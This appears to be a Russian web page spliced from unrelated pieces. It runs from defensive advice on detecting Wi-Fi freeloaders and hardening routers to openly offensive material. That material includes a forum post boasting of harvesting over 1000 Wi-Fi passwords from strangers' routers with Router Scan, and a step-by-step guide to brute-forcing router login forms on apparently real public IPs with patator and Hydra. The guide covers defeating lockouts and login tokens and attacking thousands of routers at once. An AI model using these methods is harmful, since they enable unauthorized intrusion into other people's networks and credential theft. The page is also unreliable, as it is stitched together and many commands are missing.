Как понять, что ваш Wi-Fi воруют? | Интернет | Блог
Wi-Fi-роутер сейчас есть практически везде, где есть Интернет. И провайдеры, и создатели роутеров, конечно, позаботились о безопасности устройств. Однако всегда есть шанс, что кто-то посторонний «присосется» к вашему Интернету. Чем это опасно и как предотвратить воровство — мы в подробностях расскажем в нашем материале.
Воровство Wi-Fi: чем это опасно?
Сейчас трудно встретить человека, который оставляет домашний Wi-Fi без пароля. Дело не сколько в безопасности, сколько в принципе «я плачу — я и пользуюсь». Однако действительно надежные пароли устанавливают не все. Например, в ходе недавнего исследования эксперты выявили самые популярные пароли. В их числе «12345678», «qwerty» и их комбинации. Естественно, все эти наборы актуальны и для роутеров. Так что взломать чей-то Wi-Fi иногда намного проще, чем кажется.
Насколько это критично? Здесь все зависит от целей вора. В лучшем случае недобросовестный сосед будет пользоваться вашим интернетом исключительно для серфинга в Сети или просмотра видео. Если у вас высокая скорость и мощный роутер, заметить такую «пиявку» даже не всегда получится. А вот если интернет медленный, то еще один пользователь определенно доставит хлопот: он будет отбирать часть вашего трафика.
Есть и более опасные ситуации. Ваш IP-адрес могут использовать для незаконной деятельности. Во всяком случае, с точки зрения силовиков. Например, ваш сосед — ярый любитель оставлять нелицеприятные комментарии в социальных сетях. Учитывая текущее законодательство, за это вполне можно получить административное или уголовное наказание. Проанализировав IP-адрес, специалисты провайдера могут определить абонента и его фактическое место проживания. И потом доказывай, что это все ваш сосед…
В худшем случае вы можете потерять данные авторизации к каким-либо аккаунтам. Причем это возможно даже при использовании защиты уровня WPA2 и HTTPS. Конечно, для этого взломщику требуются определенные навыки и соответствующий софт.
Риск того, что ворующий у вас Wi-Fi сосед совершает целенаправленную атаку, невысок. Но в любом случае не стоит игнорировать предупреждения браузера о том, что вам не удалось получить защищенное соединение.
От воришек Wi-Fi лучше избавляться сразу, поскольку предугадать последствия их действий никогда нельзя.
Как определить вора Wi-Fi
Первыми симптомами воровства может стать падение скорости, например, при скачивании торрентов или работе iPTV. Например, при фактической скорости 80 Мбит/с (10 Мбайт/с) и отключении всех других устройств от Wi-Fi у вас идет скачивание на уровне 5-8 Мбайт/с. Это хороший повод поискать, куда девается трафик. Конечно, эти проблемы могут быть вызваны сбоями у самого провайдера. Поэтому для окончательного ответа вам придется воспользоваться одним из представленных методов.
Веб-консоль роутера
Самый простой способ проверить все подключенные устройства — зайти в настройки самого роутера. Для этого вам потребуется открыть в браузере его веб-интерфейс (как правило, по адресу 192.168.0.1), заполнить логин/пароль. Эти данные имеются на этикетке самого маршрутизатора. Само собой, стандартный логин и пароль лучше сменить. Это первая мера по обеспечению безопасности вашего Wi-Fi.
Дальше необходимо найти список подключенных устройств. В TP-LINK, например, это можно сделать в блоке «Беспроводной режим» — «Статистика». Здесь отображаются гаджеты, подключенные по Wi-Fi. Главная проблема — низкая информативность, поскольку указаны лишь MAC-адреса.
MAC-адрес — это уникальный номер оборудования в сети. Вы можете его заскринить, после чего перейти в блок «DHCP» — «Список клиентов». Здесь уже можно поискать наименования подключенных устройств, в том числе проводных. Например, мы видим персональный компьютер и два смартфона (Redmi Note 7 и Mi9T Pro), а также нашу имитацию вора — Unknown.
В роутерах ASUS дополнительно показывается и тип соединения — проводное или беспроводное. Как правило, заодно определяется тип устройства (смартфон или ноутбук).
Остается только найти в списке гаджет, который не принадлежит вам. В худшем случае все подключенные устройства будут отображаться как Unknown (в том числе, собственные). Что делать в этом случае? Можно сравнивать MAC-адреса имеющихся гаджетов, выявив вора. Или же перейти к другим способам.
Узнать MAC-адрес своего смартфона обычно можно через настройки в разделе «Общие сведения».
Мобильные приложения
Можно попробовать найти вора прямо со своего смартфона. Например, для роутеров TP-LINK есть фирменное приложение Tether. С его помощью можно смотреть основные параметры роутера и делать некоторые базовые настройки. Для входа вам потребуется только знать логин и пароль от маршрутизатора.
Tether предлагает аналогичную информацию как и в веб-интерфейсе, просто в более удобной и понятной форме. Например, на вкладке «Клиенты» вы сразу можете посмотреть, кто подключен к роутеру.
Аналог такого приложения имеется и у ASUS. Это быстрый и удобный способ проверить Wi-Fi на наличие посторонних подключений.
Что делать, если для вашего роутера нет фирменного приложения? Скачайте сторонние программы! В Play Market имеется с десяток программ, созданных специально для анализа подключенных клиентов. Среди самых высоко оцененных — «Кто ворует мой Wi-Fi» и «Кто использует мой Wi-Fi». Такой софт позволяет получить информацию обо всех подключенных устройствах и другие полезные данные.
Приложения для компьютера и ноутбука
Мониторить сеть можно с помощью специализированных программ. Самая простая и общедоступная — Wireless Network Watcher. Функционал сводится к сканированию IP-адресов и выдачи результатов в таблице. Софт мониторит все подключения в режиме реального времени. Можно выставить звуковой сигнал, который сообщает о подключении/отключении какого-либо устройства. Как мы видим, модели телефонов программа определить не смогла, но установила устройство Unknown как гаджет от Xiaomi.
Альтернативный вариант — SoftPerfect WiFi Guard. После запуска программы достаточно выбрать сетевой адаптер и запустить сканирование. По сути, софт предлагает все те же возможности, но с дополнительными фишками. Например, вы сразу можете отметить проверенные устройства (зеленые). Все остальные не зарегистрированные устройства будут отображаться красным цветом. Дополнительно выводится время, затраченное на соединение. Косвенно это поможет определить, как далеко находится вор вашего Wi-Fi.
Рекомендуем воспользоваться веб-сервисом F-Secure Router Checker. Он не определяет количество и тип подключенных к роутеру устройств, но позволяет проверить перехват DNS-запросов. Злоумышленники могут через взлом роутера перенаправлять вас на фишинговые сайты, идентичные по дизайну официальным страницам. В итоге вы введете свой логин и пароль, даже не догадываясь об опасности. Если сервис определит проблему, значит, ваш маршрутизатор подвергся взлому. Тогда необходимо срочно сменить данные авторизации (или сделать сброс до заводских настроек).
Как отключить воришку от Wi-Fi
Избавиться от «нахлебников» можно разными способами. Лучше всего — через настройки роутера или фирменные приложения для смартфона.
В веб-интерфейсе вам необходимо найти блок «Защита» (или аналогичный) и выставить фильтрацию по MAC-адресам. Здесь есть два варианта.
- создать «белый список» — разрешить подключаться только тем устройствам, чей MAC-адрес имеется в таблице;
- создать «черный список» — запретить подключение гаджетам с указанными MAC-адресами.
Первый вариант предпочительнее: с ним не придется каждый раз «вылавливать» MAC-адрес вора. Но если вы захотите подключить новый гаджет к сети, придется отдельно прописывать разрешение в таблице. Аналогичный режим есть и у других роутеров.
Избавиться от нежелательных гаджетов можно в один клик через фирменные приложения. Например, уже в описанном Tether.
Заблокировать нежелательные подключения позволяет и сторонний софт, например, Netcut или аналоги.
Потом остается только максимально обезопасить точку доступа.
- смените пароль и логин для авторизации в веб-интерфейс роутера;
- поставьте шифрование WPA2 Personal или новейший WPA3;
- отключите широковещательный SSID — так ваш Wi-Fi не будет появляться при общем сканировании;
- закройте доступ к веб-интерфейсу для всех устройств, кроме указанного;
- установите одну из программ для мониторинга сети с оповещением при подключении незарегистрированных устройств.
Выполнив все эти пункты, вы снизите до минимума шанс несанкционированной кражи вашего интернета и обезопасите себя от злоумышленников.
Как защитить роутер от взлома и несанкционированного доступа
Вопросу обеспечения защиты Вай-Фай роутера от взлома обычные рядовые пользователи уделяют мало внимания. И совершенно зря! Современный беспроводной маршрутизатор — это не просто устройство доступа, а целый мини-компьютер со своей операционной системой (как правило, на базе Linux). А этот факт уже накладывает определённый набор требований по безопасности, про которые обыватели обычно забывают, за что частенько получают набор неприятных «сюрпризов» начиная от навязчивой рекламы и заканчивая потерей личных данных. А ведь защитить Вай-Фай роутер от взлома совсем не сложно — достаточно просто соблюдать ряд требований и тогда несанкционированного доступа к устройству удастся избежать!
Вот несколько простых и доступных каждому советов, которые позволят максимально обеспечить безопасность роутера, его беспроводной сети и передаваемых данных.
1. Пароль для входа в настройки роутера
Как показывает практика, пользователи ставят замудрёные пароли на компьютер, графические ключи на планшеты и телефоны, а вот про главное устройство доступа в сеть Интернет почему-то напрочь забывают, оставляя тот, что идёт изначально — admin, 1234 и т.п. Этим как раз и пользуются злоумышленники для входа в настройки роутера через Веб-конфигуратор или Telnet. Не так давно была массовая атака вируса Trojan.RBrute на абонентские модемы и маршрутизаторы, которая использовала эту брешь чтобы прописать в конфигурацию посторонние DNS-серверы. В итоге пользователи долго искали причину появления огромного количества навязчивой рекламы на своём компьютере или ноутбуке, а она скрывалась на роутере. Чтобы избежать всего этого геморроя, обычно достаточно просто поменять пароль для входа.
2. Устаревшая прошивка маршрутизатора
Как показывает статистика, на более чем 60% Вай-Фай роутеров используется устаревшее программное обеспечение. У трети из них имеются уязвимости, которые злоумышленники могут грамотно использовать для заражения вирусом или кражи данных. Производители стараются более-менее оперативно устранять эти прорехи и выкладывают свежие прошивки. Забывать про это не стоит и хотя бы раз в полгода нужно проверять наличие нового ПО и перепрошивать роутер. Сама процедура очень простая и на современных модемах и маршрутизаторах выполняется за несколько минут. Сначала Вам надо зайти в веб-интерфейс устройства и на статусной странице посмотреть текущую версию ПО (Firmware Version).
Потом перейдите на официальный сайт его производителя. В разделе поддержки пользователей поищите по модели самую последнюю версию прошивки и скачайте её.
Далее опять открываем веб-конфигуратор, заходим в «Системные настройки» и находим раздел «Обновление ПО» (Firware Update).
Нажимаем сначала на кнопку «Обзор»(Browse) для выбора файла с микропрограммой, а потом — на кнопку «Обновить»(Update). Через пару минут аппарат перезагрузится уже с новой прошивкой.
3. Неправильная настройка WiFi
Ещё одна популярная лазейка в безопасности маршрутизатора, которой так любят пользоваться малолетние «хакеры» чтобы взломать соседский роутер — это неправильная настройка беспроводной сети WiFi. Во-первых, многие попросту делают её открытой, чтобы не мучиться с вводом пароля на подключаемых устройствах. Делать этого нельзя, так как любой желающий сможет подключиться к Вашей домашней сети. В лучшем случае злоумышленник будет просто загружать Ваш канал своим трафиком, а в худшем — сможет увести личные данные, фото и т.п. Обязательно делайте сетку закрытой с использованием стандарта безопасности WPA2-PSK и шифрованием AES!!!
Во-вторых, многие оставляют пароль на Вай-Фай таким, какой он был по-умолчанию. Таким образом, например, в 2014 году в Москве был зафиксирован массовый взлом GPON-терминалов ZTE. Обязательно меняйте ключ сети на свой собственный. Главное, чтобы он был не короче 8 символов и сложен в подборе.
В третьих, чтобы защитить свой WiFi роутер от взлома беспроводной сети обязательно, ещё раз повторю — обязательно отключайте в настройках функцию WPS. Несмотря на всё удобство, вреда она может принести больше, чем пользы. Именно эту брешь используют чтобы взломать запароленную сеть Вай-Фай.
Мне кажется, что мой роутер взломали — что делать?!
Если у Вас есть подозрения о том, что Вы стали жертвой взломщиков — стоит принять меры как можно быстрее. Начните с того, что проверьте актуальность программного обеспечения ( см. п.1 статьи). После этого необходимо с помощью кнопки «Reset» выполнить полный сброс настроек роутера к заводским параметрам. Этим Вы удалите все изменения в настройках, которые были внесены злоумышленниками.
После этого необходимо заново настроить его заново, принимая во внимание пункты 2 и 3 данной статьи.
Она поможет определить насколько безопасен и надёжен используемый Вами DNS-сервер и вовремя определить фейк.
Приведённые выше советы позволят Вам обезопасить себя и защитить свой роутер по максимуму от несанкционированного доступа и сетевых атак. Конечно, даже они не могут дать 100%-ную защиту от взлома, но большего для обычной домашней сети обычно и не требуется.
Kali linux взлом админки роутера • Вэб-шпаргалка для интернет предпринимателей!
Pirnazar
Well-known member
Между прочим, этот самый Router Scan от Stas’M — потрясающая штука! Мне же больше всего нравится в этой программе:
- сканирование, при котором показываются как роутеры, так и другие аппаратно-программные элементы (камеры, серверы и пр.)
- перебор типичный паролей для найденных роутеров
- использование эксплойтов для ряда роутеров
- если получилось подобрать пароль или сработал эксплойт, то парсится вся информация, которую удалось достать. А это, обычно, логин-пароль, пароль от Wi-Fi, данные локальной сети и т. д.
Программа уникальна тем, что, в лучших традициях графических интерфейсов, нужно нажать одну кнопку и она всё сделает сама. Никаких знаний не нужно.
Программа мне понравилась до такой степени, что я стал искать альтернативы для Linux. Альтернатив я не нашёл.
Но главная идея этой программы — сканировать сеть и искать роутеры с дефолтными паролями или со слабыми прошивками — мне показалась настолько потрясающей, что захотелось сделать что-то подобное для Linux. Это задача средней сложности, т. е. вполне достижимая. Благо большинство модулей уже есть готовые: nmap (для сканирования портов) + curl (для аутентификации и применения эксплойтов) + grep (для парсинга страниц аутентификации (при определении модели роутера) и парсинга паролей и прочих полезных вещей при удачном подборе пароля/применении эксплойта).
У меня даже получилось сделать рабочий концепт, который насобирал для меня за день более 1000 паролей Wi-Fi. Концепт получился жутко медленным: сканер написан на PHP, причём написан без каких либо оптимизаций — всё делается в один поток, да при этом сканер реализован на попытке установить сокетное соединение. Т.е. если соединение происходит — значит начинает пробовать стандартные пароли и вынимать информацию из роутера в случае успеха. Если соединение не происходит — то программа ждёт, пока пройдёт время по таймауту. Понятно, что чаще соединение не происходит и, как следствие, почти всё время программа ждём окончания таймаутов. Всё это можно ускорить и оптимизировать, добавить новые модели роутеров. В общем, если за лето будет достаточно времени, чтобы доделать (хоть на базе nmap, хоть на базе PHP) до уровня «не стыдно показать исходный код», то обязательно поделюсь своими наработками. Благо что алгоритмы эксплойтов, которые применяются в сканере роутеров от Stas’M, доступны в виде исходных текстов и их вполне можно переписать под curl.
Вернёмся к Router Scan от Stas’M. Он шикарный! С его помощью вы сами можете насобирать уйму паролей от роутеров, от сетей Wi-Fi и узнать много нового о сетях и об обитающих там устройствах.
Если вы пользователь Windows, то для вас всё совсем просто — скачиваете, запускаете, вводите диапазон адресов и ждёте окончания сканирования.
Для пользователей Linux также возможен запуск программы Router Scan от Stas’M под Wine. Я покажу как это сделать на примере Kali Linux.
Установка Wine в Kali Linux
Внимание, если у вас Kali 2.0, то перейдите к инструкции “Установка Wine в Kali Linux 2.0“.
Если посмотреть информацию о пакете Wine в Kali Linux, то там будет указано, что пакет уже установлен. Если попытаться его запустить, то выясниться, что это всего-навсего заглушка, которая и рассказывает как провести установку. Вся установка делается тремя командами:
), распаковываете (в любое место), кликаете правой кнопкой по файлу RouterScan.exe, в контекстном меню выбираете «Открыть с помощью Wine…», а дальше всё как на Windows.
Вот пример работы Router Scan от Stas’M в Linux (сканирую диапазоны адресов моего родного города Муром):
Только хорошие результаты:
Если кто-то не до конца уловил принципы работы программы:
- программе не нужен Wi-Fi приёмник или что-то ещё — она работает по проводному соединению;
- чтобы попытаться взломать соседский Wi-Fi (а не на другом конце света), то нужно знать IP соседа или, хотя бы, диапазон IP интернет-провайдера соседа. Можно воспользоваться
Где вместо ‘URL‘ введите адрес страницы на ipgeobase.ru, которую нужно пропарсить.
VALERY
23.07.2015 в 16:07
Вообще штука офигенная
ANGEL
30.08.2015 в 20:35
подскажите как установить на амд х64?
WEBWARE TEAM
31.08.2015 в 06:14
Разницы нет – точно также.
MR_YODA
31.08.2015 в 11:34
Большое спасибо за сайт! Все статьи очень интересные и познавательные. AdBlock выключил.
WEBWARE TEAM
31.08.2015 в 15:40
Спасибо, что не прошли мимо моей просьбы.
MOOGE
06.09.2015 в 19:45
В контекстном меню не появляется «Открыть с помощью Wine…». Что можете посоветовать? Все команды выполнил по инструкции.
WEBWARE TEAM
07.09.2015 в 06:29
Если у вас в контекстном меню не появился Wine, то сделайте так:
нажмите правой кнопкой на приложение, которое хотите запустить
выберите «Открыть в другой программе»
там где строка для ввода введите wine и нажмите кнопку «Установить по умолчанию», нажмите ОК. Теперь все .exe файлы будут открываться двойным кликом.
Про Wine в Kali 2.0 написал отдельно: Установка Wine в Kali Linux 2.0
MIAL
10.11.2015 в 07:21
Я заглянул в окно дома соседа и увидел у него большой плазменной телевизоре, ещё на столе я увидел телефон, а в комнате его жену и двух детей.
Аналогия понятна?
Мой совет лично вам: ничего с ней не делать.
LAN
13.01.2016 в 08:01
Я тоже люблю С.Моэма…
Как прочекать кучу найденных IP камер на стандартные лог/пасы?
LAN
13.01.2016 в 07:50
Афтор сканера не планиурет добавлять брут камер по словарю. Можно ли самому запилить брут найденых в программе камер по внутреннему словарю. Лень прост поштучно вбивать каждый ip в Кали.
ИВАН
02.10.2016 в 11:12
Ребят, какой пароль на архив?
NOWASIVEM
06.12.2017 в 14:34
Запускаю RouterScan в Vine на WifiSlax, всё работает кроме вкладки по работе с Wifi в программе RouterScan. Помогите, что можно сделать, что бы работал Wifi в программе RouterScan под Vine.
ПЕТРУЧО
17.12.2017 в 06:05
“Афтор сканера не планиурет добавлять брут камер по словарю. Можно ли самому запилить брут найденых в программе камер по внутреннему словарю. Лень прост поштучно вбивать каждый ip в Кали.”
а ты 80й порт сканишь на камеры ? там вроде больше по сплойтам , а словать , так там файлик в роутерскане есть .
ЗЫ пароль на архив Stas’M Corp. емпни именно с точкой на конце
Этичный хакинг и тестирование на проникновение, информационная безопасность
Оглавление
Взлом страницы входа роутера
Чтобы иметь представления об HTTP аутентификации начнём с выдержки из справки Router Scan by Stas’M:
Формально можно разделить устройства на два типа — те, которые используют аутентификацию на уровне протокола HTTP, — и другие, которые её не используют — в их число входят устройства, использующие HTTP формы для авторизации.
Первый тип устройств довольно легко отличить от второго, открыв устройство в интернет браузере: у них в самом начале всегда появляется всплывающее окно с названием устройства и предложением ввести логин и пароль. Устройства второго типа не выдают подобного приглашения, а сразу открывают веб страницу, на которой также можно авторизоваться.
Но, если вы затрудняетесь визуально определить тип аутентификации, можно изучить HTTP заголовки ответа устройства, а конкретно заголовок WWW-Authenticate — именно он указывает на использование аутентификации на уровне протокола.
Для подбора пароля к таким устройствам Router Scan использует словари пар логин/пароль. Программой поддерживаются два метода аутентификации на уровне протокола:
- Basic — базовая аутентификация, имя пользователя и пароль обрабатываются обратимым шифром и отправляются в заголовках (подробнее).
- Digest — дайджест аутентификация, данные для входа необратимо хешируются алгоритмом MD5 и отправляются в заголовках (подробнее).
Для остальных устройств, не использующих эти методы, перебор по словарям не поддерживается (за исключением некоторых моделей, для которых была добавлена поддержка словаря Form аутентификации). Но можно воспользоваться функцией Use credentials в главном окне программы, которая проверяет пару логин/пароль независимо от метода аутентификации.
Итак, Router Scan использует брут-форс форм для авторизации на роутере не для всех моделей, в результате можно получить следующую картину:
Это несколько кучных подсетей в которых в избытке водится роутер ZTE F668. Скажу больше — почти во всех них стандартные логины и пароли, но ни Router Scan, ни RouterSploit не извлекает из них информацию, поскольку на роутере вход выполняется с помощью веб-формы, а для этой модели брут-форс не поддерживается.
Брут-форс веб-форм роутеров
Нам понадобится несколько инструментов. Первый из них — Burp Suite. По приведённой ссылке есть инструкции, в том числе для настройки работы Burp Suite с веб-браузерами — не будем здесь на этом останавливаться, выполните подготовительные действия самостоятельно.
Итак, открываем в веб-браузере интересующий нас роутер:
и убеждаемся, что Burp Suite действительно видит передаваемые данные:
Теперь отправляем заведомо неправильные данные, например, имя пользователя 11111111 и пароль 22222222:
Переходим к анализу в Burp Suite:
Данные отправляются методом POST, на страницу / (корневая папка) отправляется HTTP заголовок с кукиз Cookie: _TESTCOOKIESUPPORT=1, передаётся строка вида:
Смотрим ответ, для начала переключаемся на рендер:
Отлично, в ответе содержится слово Error, поищем его в сырых передаваемых данных:
Анализируем обычный ответ, без ввода пароля:
Там также встречается слово Error, то есть его наличие ни о чём не говорит — такой маркер не подходит для брут-форса. Надеюсь, самые внимательные заметили, что в ответе, пришедшем на аутентификацию, найдено два совпадения с Error, а в обычном ответе, только одно. Смотрим ещё раз ответ после попытки аутентификации:
В этом ответе содержится очень характерная строка:
Брут-форс роутеров
Для брутфорса я буду использовать программу patator. Чтобы вам было понятно, почему, прочитайте статью «Брут-форс веб-сайтов: инструкция по использованию patator, Hydra, Medusa». В этой же статье вы научитесь использовать patator для брут-форса веб-форм сайтов.
В общем виде, в самом простом случае, наша команда будет иметь следующий вид:
Теперь давайте заполним пробелы.
В качестве URL будет IP адрес роутера, например, 58.8.246.217, в качестве body нам нужно взять передаваемую строку, в нашем случае это frashnum=&action=login&Frm_Logintoken=0&Username=11111111&Password=22222222
И в ней в том месте, где имя пользователя, вставим FILE0, а вместо пароля вставим FILE1. В моём случае получилось: body=’frashnum=&action=login&Frm_Logintoken=0&Username=FILE0&Password=FILE1′
Теперь нам нужно указать путь до словарей. Словарь с именами пользователей у меня называется users.txt и расположен в той же папке, где я запускаю patator. Содержимое моего небольшого словаря:
Таким образом, я указываю имя словаря строкой 0=users.txt
Файл с паролями у меня называется passwords.txt, путь до него я указываю строкой 1=passwords.txt.
Содержимое моего файла passwords.txt:
Вспомним, что при отправке запроса также отправляется заголовок с куки _TESTCOOKIESUPPORT=1, поэтому к нашей команде мы добавляем header=’Cookie: _TESTCOOKIESUPPORT=1′.
Теперь нам нужно установить условие, по которому будет определяться, выполнен вход или нет. Этой строкой является «User information is error, please input again», поэтому для игнорирования ответов, содержащих указанную строку, мы запишем следующую опцию: -x ignore:fgrep=’User information is error’. Я немного сократил строку, так как точки и запятые у patator вызывают ошибки. Команда ignore говорит не сообщать о результатах, которые соответствуют следующему за двоеточием условию. Команда fgrep означает поиск строки в полученных данных. Для точного сообщения используется команда mesg, а для поиска по регулярному выражению есть команда egrep.
Собираем всё вместе:
Получаем такой результат:
Это странный результат, как будто бы почти все логины и пароли оказались верными.
Обратим внимание на строку с 302 Moved Temporarily. Она говорит о том, что при вводе учётных данных admin:password роутер хотел нас куда-то перенаправить. Видимо, это и есть правильные учётные данные (логинимся на роутере для проверки), а всё остальное это ложные срабатывания. Подумаем, как это могло получиться?
Получается, что по каким-то причинам роутер перестаёт отправлять строку «User information is error». Можно предположить, что после аутентификации, роутер запоминает наш IP и теперь все входы с этого адреса разрешены. Это можно проверить открыв в браузере страницу роутера. В моём случае это предположение не подтвердилось.
Самой вероятной причиной может быть защита от брутфорса. Попробуем быстро ввести несколько раз неправильные учётные данные. Точно:
Причина найдена, вместо строки «информация о пользователе это ошибка», нам показывают «You have input the wrong username or password for three times. Please try again a minute later», то есть «вы ввели имя пользователя или пароль неправильно три раза. Попробуйте снова через минуту».
Программа patator поддерживает одновременное использование нескольких опций -x и можно было бы добавить -x ignore:fgrep=’You have input the wrong username or password for three times’, но это не решает главную проблему: после трёх неправильных попыток нужно подождать 1 минуту. Для её исправления можно установить временной интервал между попытками в 1 минуту: —rate-limit=60
Но вспомним, что при вводе верных учётных данных происходит переадресация — сервер возвращает код 302:
Поэтому можно использовать конструкцию из двух опций: -x quit:code=302 и -x ignore:code=200. Перед двоеточием идёт команда, а затем условие, при котором выполняется эта команда. В первой строке quit означает выйти, как только получен код 302, то есть пароль найден и продолжать не нужно. Вторая команда ignore означает не показывать полученные данные при получении кода 200.
В результате получается команда:
Случайные величины в форме входа
Если сделать несколько попыток входа и изучить передаваемые данные, то можно заметить, что значение переменной Frm_Logintoken меняется.
Конкретная величина прописана в JavaScript коде:
И она меняется время от времени. Если передавать строку с неверно установленным токеном Frm_Logintoken, то роутер не примет даже правильный пароль. Это ещё одна защита от брутфорса. К счастью, patator имеет встроенный механизм обхода такой защиты.
Для этого используются опции before_urls и before_egrep. Опция before_urls указывает, какую страницу нужно загрузить до того, как будет сделана попытка аутентификации. А опция before_egrep ищет по заданному регулярному выражению в исходном коде страницы, полученной с помощью before_urls.
Для брут-форса исследуемого роутера нужно предварительно получить тот же адрес на котором вводятся данные, то есть before_urls=58.11.48.84.
Пример поиска по регулярному выражению: before_egrep=’_N1_:getObj(«Frm_Logintoken»).value = «(w+)»’
Здесь переменной _N1_ присваивается значение обратной ссылки — выражения в скобках. w+ обозначает главные составные символы, это синоним для «[_[:alnum:]]». Ещё раз — обратите внимание на скобки — это обратная ссылка. При этом в исходном фрагменте кода также присутствуют скобки — их нужно экранировать.
Также меняется передаваемая строка:
Теперь в ней используется _N1_ для присвоения значения параметру Logintoken.
Дополнительные примеры, в том числе для сразу двух величин, смотрите на странице https://kali.tools/?p=269.
Если роутер (или веб-приложение) устанавливает кукиз со случайным значением, то достаточно использовать before_urls в паре с accept_cookie=1 (принимать кукиз для последующей передачи).
Полная команда для брут-форса формы входа, с учётом всех нюансов исследуемой модели роутера, выглядит так:
Оптимизация брут-форса путём атаки сразу на несколько целей
Одна попытка в минуту это довольно медленно. Кстати, ведь в рассматриваемых условиях мы можем делать по три попытки в минуту, затем делать паузу. Не уверен, можно ли это сделать встроенным средствами patator.
Зато в patator есть очень полезный алгоритм, который используется по умолчанию при брут-форсе большого количества объектов. Можно запустить перебор учётных данных сразу на множестве роутеров. Для этого в качестве цели с опцией url укажите файл, например, url=FILE2, также укажите путь до самого файла: 2=routers_IP.txt. patator будет работать следующим образом: пробовать один логин:пароль на первом роутере, затем переходить ко второму роутеру и там пробовать один логин:пароль, затем к следующему, пока список не кончится. Когда список завершится, то patator зайдёт на второй круг и для первого роутера попробует вторую пару логин:пароль, затем перейдёт к следующему роутеру и так далее. В результате возникает естественная задержка между попытками ввода на одном роутере — пока делаются попытки входа на следующих в списке, каждому роутеру даётся время «передышки». Это позволяет значительно сократить значение —rate-limit или вовсе не использовать, так как если одновременно брут-форсятся десятки тысяч роутеров, то очередь до каждого роутера может доходить более чем через минуту. Номер файла имеет значение! То есть в начале полный круг проходится для файлов с номером . Это могут быть, например, имена пользователей. Если вы будете брать адреса роутеров для брут-форса из файла с номером , то patator будет атаковать только первый в списке роутер и перейдёт к следующему только тогда, когда закончатся логины и пароли для проверки.
На случай если найдены верные логин:пароль, то вместо команды quit (выход из программы), нужно использовать команду free (остановка тестирования хоста после нахождения валидного пароля) примерно следующим образом: -x free=url:code=302
Заключение
Итак, мы рассмотрели брут-форс роутера на примере конкретной модели. Мы столкнулись почти со всеми возможными проблемами, которые могут возникнуть при брут-форсе как роутеров в веб-формой входа, так и других веб-приложений, также использующих веб-форму для аутетификации. Разве что, не была рассмотрена ситуация с капчей и использованием набора прокси для ускорения процесса.
В целом алгоритм всегда примерно одинаковый:
- Анализ передаваемых данных. Это удобно делать с помощью Burp Suite. Особое внимание следует уделить произвольно меняющимся полям, кукиз, значению реферера и значению user-agent (это всё передаётся в HTTP заголовках)
- Анализ возвращаемых данных и поиск самых характерных маркеров и событий, свидетельствующих о правильности или неправильности логина и пароля
- Перед запуском брут-форса следует сделать проверку на методы противодействия брут-форсу
- В качестве маркера, который говорит patator об успешности входа, нужно выбирать строку или событие, у которого меньше всего вероятность вызвать ложное срабатывание
- Некоторым видам защит (например, блокировка после нескольких неправильных попыток) невозможно противодействовать, но можно оптимизировать процесс атаки различными способами
*Здесь могло быть предупреждение о том, что не нужно пользоваться данной программой в преступных целях, но hydra это пишет перед каждым сеансом взлома*
В общем, решил я по своим нуждам покопаться в настройках роутера, вбиваю я всем знакомый адрес, а тут пароль спрашивают. Как быть? Ну, начал я перебирать пароли, а их количество слишком большое, что бы перебирать все и слишком маленькое, чтобы делать reset.
И я открыл google. После пары запросов я узнал о такой вещи как hydra. И тут началось: жажда открытий, поиски неизведанного и так далее.
Приступим
Первым делом мной был составлен словарь паролей, ни много, ни мало, аж на 25 комбинаций. Далее качаем либо Kali linux, либо саму Гидру (если вы пингвин у вас линукс). Теперь у нас два варианта (ну как два, я нашел информацию по двум вариантам).
Либо у вас вот такое диалоговое окно:
Либо логин и пароль запрашивает форма на сайте. Мой вариант первый, поэтому начнем с него. На нашем пути к «админке» стоит страж в виде диалогового окна. Это вид авторизации http-get.
Открываем терминал. Вводим:
Где после «-l» идет логин, после «-P» словарь, после «-s» порт. Также в нашем распоряжении есть другие флаги:
-R восстановить предыдущую прерванную/оборванную сессию
-S выполнить SSL соединение
-s ПОРТ если служба не на порту по умолчанию, то можно задать порт здесь
-l ЛОГИН или -L ФАЙЛ с ЛОГИНАМИ (именами), или загрузить несколько логинов из ФАЙЛА
-p ПАРОЛЬ или -P ФАЙЛ с паролями для перебора, или загрузить несколько паролей из ФАЙЛА
-x МИНИМУМ: МАКСИМУМ: НАБОР_СИМВОЛОВ генерация паролей для брутфорса, наберите «-x -h» для помощи
-e nsr «n» — пробовать с пустым паролем, «s» — логин в качестве пароля и/или «r» — реверс учётных данных
-u зацикливаться на пользователя, а не на парлях (эффективно! подразумевается с использованием опции -x)
-C ФАЙЛ формат где «логин: пароль» разделены двоеточиями, вместо опции -L/-P
-M ФАЙЛ список серверов для атак, одна запись на строку, после двоеточия ‘:’ можно задать порт
-o ФАЙЛ записывать найденные пары логин/пароль в ФАЙЛ вместо стандартного вывода
-f / -F выйти, когда пара логин/пароль подобрана (-M: -f для хоста, -F глобально)
-t ЗАДАЧИ количество запущенных параллельно ЗАДАЧ (на хост, по умолчанию: 16)
-w / -W ВРЕМЯ время ожидания ответов (32 секунды) / между соединениями на поток
-4 / -6 предпочитать IPv4 (по умолчанию) или IPv6 адреса
-v / -V / -d вербальный режим / показывать логин+пароль для каждой попытки / режим отладки
-q не печатать сообщения об ошибках соединения
-U подробные сведения об использовании модуля
server цель: DNS, IP или 192.168.0.0/24 (эта ИЛИ опция -M)
service служба для взлома (смотрите список поддерживаемых протоколов)
OPT некоторые модули служб поддерживают дополнительный ввод (-U для справки по модулю)
Ну вот так как-то:
Не мой, честно взят с Античата, с исправлением грамматических ошибок автора (Обилие знаков пунктуации я оставил). Интересно это можно считать переводом?
Нас встречает форма на сайте:
Такой метод авторизации — http-post-form, и тут нужно немного повозится, так как нам нужно понять, как браузер отправляет роутеру данные.
В данном случае и использовал браузер Chrome (его аналог Chromium в Kali Linux, ставится через apt-get install chromium).
Сейчас нужно сделать одну очень глупую вещь… указать неверный логин и пасс…
для чего увидим позже…
Нажимаем F12 что бы перейти в режим редактирования веб-страницы.
Переходим в Network → Включаем галочку Preserv log.
Вводим ложные логин и пароль…
Ну что за дела? Так не пойдет! Более того, после нескольких неудачных попыток входа, форма блокируется на 180 секунд. и тогда строка будет иметь вид:
Обратите внимание что между частями скрипта двоеточие! это обязательно! Кстати, блокировки формы через гидру не происходило… Это очень радует.
В работоспособности второго метода мне убедиться не светит, так как я не обладатель подходящей модели роутера. Придется довериться экспрессивному человеку с Античата.
Если кому интересно, будьте добры, проверьте и отпишитесь в комментариях. Я работал с роутером TL-WR1043N/TL-WR1043ND. Роутер с Античата — D-link300NRU.
Рекомендуем к прочтению
